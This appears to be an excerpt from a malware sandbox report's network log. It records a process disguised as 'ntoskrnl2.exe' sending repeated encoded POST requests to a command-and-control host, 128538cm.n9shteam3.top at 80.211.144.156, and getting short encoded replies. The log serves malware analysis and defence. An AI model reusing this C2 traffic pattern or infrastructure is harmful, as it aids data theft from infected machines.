                                                            83          192.168.2.6  49830        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:34:58.695794106 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:59.096906900 CEST  1028  OUT  Data Raw: 55 54 5a 5f 5e 47 5c 50 5b 5f 56 5a 57 5a 50 5d 55 5d 5e 47 50 58 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZ_^G\P[_VZWZP]U]^GPXZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z$1?+43!_'.:^?-$0<)?(=$_>W%/:%^./]+
                                                            Sep 2, 2024 13:34:59.377006054 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:59.507061005 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:59.732682943 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            84          192.168.2.6  49831        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:34:59.840683937 CEST  346  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:35:00.196726084 CEST  1024  OUT  Data Raw: 55 5f 5f 55 5b 46 59 53 5b 5f 56 5a 57 5d 50 5f 55 59 5e 49 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U__U[FYS[_VZW]P_UY^IP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$2=+;4%23?-$8Z'Z9V+;;*^*:Y-:%^./]+<
                                                            Sep 2, 2024 13:35:00.487973928 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:00.614816904 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            85          192.168.2.6  49832        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:00.755006075 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:01.103287935 CEST  1028  OUT  Data Raw: 50 53 5a 57 5e 45 59 54 5b 5f 56 5a 57 58 50 5e 55 50 5e 47 50 53 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZW^EYT[_VZWXP^UP^GPSZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3!&?_$T:0--($;B<$)W+(8U(74)"-%^./]+<
                                                            Sep 2, 2024 13:35:01.401489019 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:01.684755087 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:01.684947014 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            86          192.168.2.6  49833        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:03.068628073 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:03.415637970 CEST  1028  OUT  Data Raw: 50 51 5a 5f 5e 49 59 53 5b 5f 56 5a 57 5f 50 5a 55 50 5e 42 50 59 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZ_^IYS[_VZW_PZUP^BPYZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3">?+$'!53.<.<,4?05*8U*0^=1.]::%^./]+
                                                            Sep 2, 2024 13:35:03.720129967 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:03.841665030 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            87          192.168.2.6  49834        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:03.964816093 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:04.321918011 CEST  1028  OUT  Data Raw: 55 57 5a 52 5e 46 59 50 5b 5f 56 5a 57 5c 50 5f 55 5e 5e 49 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZR^FYP[_VZW\P_U^^IP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z$".(;7Y32*$&>=;,?&<6?8()'8_?1.]:*%^./]+,
                                                            Sep 2, 2024 13:35:04.637662888 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:04.764992952 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            88          192.168.2.6  49835        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:05.275333881 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            89          192.168.2.6  49836        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:05.630213022 CEST  346  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:35:05.977963924 CEST  1028  OUT  Data Raw: 50 55 5f 56 5e 40 59 51 5b 5f 56 5a 57 5e 50 58 55 50 5e 49 50 53 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_V^@YQ[_VZW^PXUP^IPSZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$W>+^#'21Z%-%+-$\/4(Z&,!*(')7<*2*-*%^./]+$
                                                            Sep 2, 2024 13:35:06.237993002 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:06.484188080 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:06.844603062 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            90 | 192.168.2.6 | 49837 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:06.846919060 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1016
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:07.196739912 CEST | 1016 | OUT | Data Raw: 55 52 5a 57 5e 46 59 56 5b 5f 56 5a 57 5d 50 5a 55 5e 5e 48 50 58 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: URZW^FYV[_VZW]PZU^^HPXZ[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^3":=+'3%Z'"?(\, ')S<0V*$$[=].:%^./]+
                                                            Sep 2, 2024 13:35:07.495337963 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:07.705408096 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            91 | 192.168.2.6 | 49838 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:07.941667080 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:08.290469885 CEST | 1028 | OUT | Data Raw: 50 55 5f 54 5b 44 59 51 5b 5f 56 5a 57 55 50 59 55 5b 5e 41 50 58 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_T[DYQ[_VZWUPYU[^APXZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$!.?^$%Z'.5<=(^,4?0=*(;=7;>"&.%^./]+
                                                            Sep 2, 2024 13:35:09.551203966 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:09.551887035 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:09.552232027 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:09.552879095 CEST | 183 | IN | HTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:35:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ
                                                            Sep 2, 2024 13:35:09.553584099 CEST | 183 | IN | HTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:35:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            92 | 192.168.2.6 | 49839 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:09.691390038 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:10.040709972 CEST | 1028 | OUT | Data Raw: 55 53 5f 55 5e 46 5c 56 5b 5f 56 5a 57 55 50 5b 55 5e 5e 40 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: US_U^F\V[_VZWUP[U^^@P\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$%\=+'X0$*?[-4$++0>$'=9:%^./]+
                                                            Sep 2, 2024 13:35:10.333755970 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:10.538333893 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            93 | 192.168.2.6 | 49840 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:10.680849075 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:11.038419962 CEST | 1028 | OUT | Data Raw: 50 54 5a 52 5e 48 5c 50 5b 5f 56 5a 57 5b 50 5b 55 59 5e 44 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PTZR^H\P[_VZW[P[UY^DP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!X+;$%15Z$X)($-' X&<*(((4+=:*%^./]+0
                                                            Sep 2, 2024 13:35:11.354198933 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:11.486713886 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            94 | 192.168.2.6 | 49841 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:10.745142937 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1312
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:11.103883028 CEST | 1312 | OUT | Data Raw: 55 5e 5f 52 5e 41 59 56 5b 5f 56 5a 57 5f 50 5e 55 5a 5e 40 50 52 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^_R^AYV[_VZW_P^UZ^@PRZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''1<,'2_0=*X>-4-7$X$5T*('(4>!:_9%^./]+
                                                            Sep 2, 2024 13:35:11.393393993 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:11.617532015 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0a 23 27 2f 57 27 28 37 07 2a 29 04 58 3c 03 2b 18 2c 2f 0a 59 33 17 09 5f 3c 0b 21 50 31 29 21 58 29 3f 36 03 3c 1c 0b 55 35 34 20 5b 03 1f 25 5a 34 1c 21 09 25 3b 3a 01 27 09 22 5f 35 37 05 04 29 2e 25 0a 27 03 30 1f 37 32 3a 55 2f 13 26 50 32 06 3f 02 3a 2f 29 04 32 04 2a 56 08 16 38 51 3c 3c 08 1b 23 0e 23 11 23 06 36 0b 20 08 2f 52 24 0d 05 1c 25 2a 00 0b 24 00 3b 1d 2a 5b 2c 01 30 07 22 04 34 23 2a 09 2d 03 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ##'/W'(7*)X<+,/Y3_<!P1)!X)?6<U54 [%Z4!%;:'"_57).%'072:U/&P2?:/)2*V8Q<<###6 /R$%*$;*[,0"4#*-$P.-V0WS
                                                            Sep 2, 2024 13:35:11.627918005 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:11.828557014 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:11.837337971 CEST | 1024 | OUT | Data Raw: 50 55 5f 54 5e 45 59 57 5b 5f 56 5a 57 5d 50 52 55 5d 5e 49 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_T^EYW[_VZW]PRU]^IP\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3"%]+]'='1+=';$]'<8)' >).%^./]+
                                                            Sep 2, 2024 13:35:12.127609968 CEST | 158 | IN | HTTP/1.1 200 OK
